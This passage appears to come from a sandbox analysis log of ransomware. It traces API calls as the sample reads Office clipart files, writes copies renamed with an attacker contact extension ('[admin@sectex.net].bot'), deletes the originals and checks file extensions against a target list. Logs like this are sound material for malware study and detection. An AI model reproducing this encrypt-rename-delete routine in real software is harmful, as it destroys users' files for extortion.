	[0161.037] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107262.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107262.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0161.038] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=7996) returned 1
	[0161.038] CloseHandle (hObject=0x388) returned 1
	[0161.038] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107262.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107262.wmf")) returned 0x20
	[0161.038] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107262.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107262.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.038] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107262.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107262.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0161.038] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.038] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.038] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107262.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107262.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0161.039] GetLastError () returned 0x0
	[0161.039] ReadFile (in: hFile=0x388, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x1f3c, lpOverlapped=0x0) returned 1
	[0161.051] WriteFile (in: hFile=0x3d0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x1f40, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x1f40, lpOverlapped=0x0) returned 1
	[0161.052] ReadFile (in: hFile=0x388, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.052] WriteFile (in: hFile=0x3d0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0161.052] SetEndOfFile (hFile=0x3d0) returned 1
	[0161.053] CloseHandle (hObject=0x3d0) returned 1
	[0161.053] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.053] SetEndOfFile (hFile=0x388) returned 1
	[0161.055] CloseHandle (hObject=0x388) returned 1
	[0161.055] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107262.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.078] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107262.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107262.wmf")) returned 1
	[0161.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107262.WMF") returned 63
	[0161.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107262.WMF") returned 63
	[0161.089] lstrlenW (lpString=".doc") returned 4
	[0161.089] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.089] lstrlenW (lpString=".docx") returned 5
	[0161.089] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0161.089] lstrlenW (lpString=".pdf") returned 4
	[0161.089] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.089] lstrlenW (lpString=".xls") returned 4
	[0161.089] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.089] lstrlenW (lpString=".xlsx") returned 5
	[0161.089] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0161.089] lstrlenW (lpString=".ppt") returned 4
	[0161.089] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107262.WMF") returned 63
	[0161.089] lstrlenW (lpString=".zip") returned 4
	[0161.089] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.089] lstrlenW (lpString=".rar") returned 4
	[0161.089] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.089] lstrlenW (lpString=".bz2") returned 4
	[0161.089] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.089] lstrlenW (lpString=".7z") returned 3
	[0161.089] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107262.WMF") returned 63
	[0161.089] lstrlenW (lpString=".dbf") returned 4
	[0161.089] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107262.WMF") returned 63
	[0161.089] lstrlenW (lpString=".1cd") returned 4
	[0161.089] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107262.WMF") returned 63
	[0161.089] lstrlenW (lpString=".jpg") returned 4
	[0161.089] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107262.WMF") returned 63
	[0161.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107262.WMF") returned 63
	[0161.090] lstrlenW (lpString=".doc") returned 4
	[0161.090] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.090] lstrlenW (lpString=".docx") returned 5
	[0161.090] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0161.090] lstrlenW (lpString=".pdf") returned 4
	[0161.090] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.090] lstrlenW (lpString=".xls") returned 4
	[0161.090] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.090] lstrlenW (lpString=".xlsx") returned 5
	[0161.090] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0161.090] lstrlenW (lpString=".ppt") returned 4
	[0161.090] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107262.WMF") returned 63
	[0161.090] lstrlenW (lpString=".zip") returned 4
	[0161.090] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.090] lstrlenW (lpString=".rar") returned 4
	[0161.090] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.090] lstrlenW (lpString=".bz2") returned 4
	[0161.090] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.090] lstrlenW (lpString=".7z") returned 3
	[0161.090] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107262.WMF") returned 63
	[0161.090] lstrlenW (lpString=".dbf") returned 4
	[0161.090] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107262.WMF") returned 63
	[0161.090] lstrlenW (lpString=".1cd") returned 4
	[0161.090] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107262.WMF") returned 63
	[0161.090] lstrlenW (lpString=".jpg") returned 4
	[0161.090] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.091] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0161.091] lstrlenW (lpString="J0107288.WMF") returned 12
	[0161.091] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107288.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107288.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0161.091] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=13436) returned 1
	[0161.091] CloseHandle (hObject=0x1d8) returned 1
	[0161.091] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107288.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107288.wmf")) returned 0x20
	[0161.091] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107288.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107288.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.092] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107288.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107288.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0161.092] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.092] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.092] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107288.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107288.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0161.093] GetLastError () returned 0x0
	[0161.093] ReadFile (in: hFile=0x1d8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x347c, lpOverlapped=0x0) returned 1
	[0161.097] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x3480, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x3480, lpOverlapped=0x0) returned 1
	[0161.098] ReadFile (in: hFile=0x1d8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.098] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0161.098] SetEndOfFile (hFile=0x25c) returned 1
	[0161.098] CloseHandle (hObject=0x25c) returned 1
	[0161.098] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.098] SetEndOfFile (hFile=0x1d8) returned 1
	[0161.100] CloseHandle (hObject=0x1d8) returned 1
	[0161.100] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107288.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.101] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107288.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107288.wmf")) returned 1
	[0161.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107288.WMF") returned 63
	[0161.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107288.WMF") returned 63
	[0161.102] lstrlenW (lpString=".doc") returned 4
	[0161.102] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.102] lstrlenW (lpString=".docx") returned 5
	[0161.102] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0161.102] lstrlenW (lpString=".pdf") returned 4
	[0161.102] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.102] lstrlenW (lpString=".xls") returned 4
	[0161.102] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.102] lstrlenW (lpString=".xlsx") returned 5
	[0161.102] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0161.102] lstrlenW (lpString=".ppt") returned 4
	[0161.102] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107288.WMF") returned 63
	[0161.102] lstrlenW (lpString=".zip") returned 4
	[0161.102] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.102] lstrlenW (lpString=".rar") returned 4
	[0161.102] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.102] lstrlenW (lpString=".bz2") returned 4
	[0161.102] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.102] lstrlenW (lpString=".7z") returned 3
	[0161.102] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107288.WMF") returned 63
	[0161.102] lstrlenW (lpString=".dbf") returned 4
	[0161.102] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107288.WMF") returned 63
	[0161.102] lstrlenW (lpString=".1cd") returned 4
	[0161.102] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107288.WMF") returned 63
	[0161.102] lstrlenW (lpString=".jpg") returned 4
	[0161.103] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107288.WMF") returned 63
	[0161.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107288.WMF") returned 63
	[0161.103] lstrlenW (lpString=".doc") returned 4
	[0161.103] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.103] lstrlenW (lpString=".docx") returned 5
	[0161.103] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0161.103] lstrlenW (lpString=".pdf") returned 4
	[0161.103] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.103] lstrlenW (lpString=".xls") returned 4
	[0161.103] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.103] lstrlenW (lpString=".xlsx") returned 5
	[0161.103] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0161.103] lstrlenW (lpString=".ppt") returned 4
	[0161.103] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107288.WMF") returned 63
	[0161.103] lstrlenW (lpString=".zip") returned 4
	[0161.103] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.103] lstrlenW (lpString=".rar") returned 4
	[0161.103] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.103] lstrlenW (lpString=".bz2") returned 4
	[0161.103] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.103] lstrlenW (lpString=".7z") returned 3
	[0161.103] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107288.WMF") returned 63
	[0161.103] lstrlenW (lpString=".dbf") returned 4
	[0161.103] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107288.WMF") returned 63
	[0161.103] lstrlenW (lpString=".1cd") returned 4
	[0161.103] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107288.WMF") returned 63
	[0161.104] lstrlenW (lpString=".jpg") returned 4
	[0161.104] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.104] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0161.104] lstrlenW (lpString="J0107290.WMF") returned 12
	[0161.104] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107290.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107290.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0161.104] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=12308) returned 1
	[0161.104] CloseHandle (hObject=0x1d8) returned 1
	[0161.104] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107290.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107290.wmf")) returned 0x20
	[0161.104] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107290.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107290.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.105] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107290.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107290.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0161.105] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.105] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.105] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107290.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107290.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0161.106] GetLastError () returned 0x0
	[0161.106] ReadFile (in: hFile=0x1d8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x3014, lpOverlapped=0x0) returned 1
	[0161.504] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x3020, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x3020, lpOverlapped=0x0) returned 1
	[0161.505] ReadFile (in: hFile=0x1d8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.505] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0161.505] SetEndOfFile (hFile=0x25c) returned 1
	[0161.505] CloseHandle (hObject=0x25c) returned 1
	[0161.505] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.506] SetEndOfFile (hFile=0x1d8) returned 1
	[0161.509] CloseHandle (hObject=0x1d8) returned 1
	[0161.509] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107290.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.512] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107290.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107290.wmf")) returned 1
	[0161.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107290.WMF") returned 63
	[0161.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107290.WMF") returned 63
	[0161.513] lstrlenW (lpString=".doc") returned 4
	[0161.513] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.513] lstrlenW (lpString=".docx") returned 5
	[0161.513] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0161.513] lstrlenW (lpString=".pdf") returned 4
	[0161.513] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.513] lstrlenW (lpString=".xls") returned 4
	[0161.513] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.513] lstrlenW (lpString=".xlsx") returned 5
	[0161.513] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0161.513] lstrlenW (lpString=".ppt") returned 4
	[0161.513] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107290.WMF") returned 63
	[0161.513] lstrlenW (lpString=".zip") returned 4
	[0161.513] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.513] lstrlenW (lpString=".rar") returned 4
	[0161.513] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.513] lstrlenW (lpString=".bz2") returned 4
	[0161.513] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.513] lstrlenW (lpString=".7z") returned 3
	[0161.513] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107290.WMF") returned 63
	[0161.513] lstrlenW (lpString=".dbf") returned 4
	[0161.513] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107290.WMF") returned 63
	[0161.513] lstrlenW (lpString=".1cd") returned 4
	[0161.514] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107290.WMF") returned 63
	[0161.514] lstrlenW (lpString=".jpg") returned 4
	[0161.514] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107290.WMF") returned 63
	[0161.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107290.WMF") returned 63
	[0161.514] lstrlenW (lpString=".doc") returned 4
	[0161.514] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.514] lstrlenW (lpString=".docx") returned 5
	[0161.514] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0161.514] lstrlenW (lpString=".pdf") returned 4
	[0161.514] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.514] lstrlenW (lpString=".xls") returned 4
	[0161.514] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.514] lstrlenW (lpString=".xlsx") returned 5
	[0161.514] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0161.514] lstrlenW (lpString=".ppt") returned 4
	[0161.514] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107290.WMF") returned 63
	[0161.514] lstrlenW (lpString=".zip") returned 4
	[0161.514] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.514] lstrlenW (lpString=".rar") returned 4
	[0161.514] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.514] lstrlenW (lpString=".bz2") returned 4
	[0161.515] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.515] lstrlenW (lpString=".7z") returned 3
	[0161.515] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.515] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107290.WMF") returned 63
	[0161.515] lstrlenW (lpString=".dbf") returned 4
	[0161.515] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.515] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107290.WMF") returned 63
	[0161.515] lstrlenW (lpString=".1cd") returned 4
	[0161.515] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.515] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107290.WMF") returned 63
	[0161.515] lstrlenW (lpString=".jpg") returned 4
	[0161.515] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.515] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0161.515] lstrlenW (lpString="J0107344.WMF") returned 12
	[0161.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107344.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107344.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0161.516] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=5076) returned 1
